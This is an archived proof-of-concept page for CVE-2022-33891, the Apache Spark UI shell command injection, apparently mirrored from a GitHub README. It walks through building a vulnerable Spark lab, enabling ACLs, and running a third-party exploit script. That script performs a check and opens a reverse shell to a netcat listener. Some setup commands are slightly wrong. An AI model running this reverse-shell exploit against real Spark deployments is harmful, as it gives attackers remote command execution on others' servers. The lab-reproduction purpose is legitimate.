Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-33891 PoC — Apache Spark shell command injection vulnerability via Spark UI

Source
https://github.com/IMHarman/CVE-2022-33891
Associated Vulnerability
Title:Apache Spark shell command injection vulnerability via Spark UI (CVE-2022-33891)
Description:The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. With an authentication filter, this checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input, and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as. This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
Readme
# CVE-2022–33891 — Apache Spark Shell Command Injection Vulnerability

# Impacted Versions - This security issue impacts Apache Spark versions 3.0.3 and earlier, Versions 3.1.1 to 3.1.2, Versions 3.2.0 to 3.2.1.

# Proof of Concept (PoC)

STEP 1:
Install OPENJDK of version 11 with commands – 
sudo apt-get update

sudo apt-get install openjdk-11-jdk

java -version
 
STEP 2:
Install SCALA of version 3.1.3

Download TAR file from GitHub - https://github.com/lampepfl/dotty/releases/tag/3.1.3

Extract the TAR file with commands – 

cd Downloads

tar xvf {scala filename}

sudo su

mv {scala filename}  /usr/local/scala

exit

export PATH=$PATH:/usr/local/scala/bin

scala -version
 
STEP 3:
Install Apache Spark

LINK - https://archive.apache.org/dist/spark/spark-3.1.1/

FILE - spark-3.1.1-bin-hadoop2.7.tgz

Commands – 

tar xvf spark-3.1.1-bin-hadoop2.7.tgz

mv spark-3.1.1-bin-hadoop2.7.tgz /usr/local/spark

exit

sudo nano ~/.zsharc

export PATH=$PATH:/usr/local/spark/bin (Add command in the file)

source ~/.zsharc

spark-shell

Exit the Shell – Using Ctrl + C

STEP 4:
Enable ACL with commands – 

cd /usr/local/spark/conf

cp spark-defaults.conf.template spark-defaults.conf

echo "spark.acls.enable       true" >> spark-defaults.conf

cat spark-defaults.conf

cd /usr/local/spark

cd sbin

./start-master.sh

spark-shell
 
STEP 5:
Download the exploit zip file - https://github.com/HuskyHacks/cve-2022-33891

Unzip the file,

Run the Commands – 

cd Downloads/cve-2022-33891-main

python3 poc.py -u http://192.168.154.128 -p 8080 --check –verbose

STEP 6:
Install Netcat – traditional using the command – 

sudo apt install netcat-traditional

STEP 7:
Run the exploit using these commands in different terminals – 

In first shell - nc -lvp 9001

In second shell - python3 poc.py -u http://192.168.154.128 -p 8080 --revshell -lh 192.168.154.128 -lp 9001 –verbose
File Snapshot

 [4.0K]  /data/pocs/63bcc7232c8acf6b93363065b1241fa12e729704
└── [1.9K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →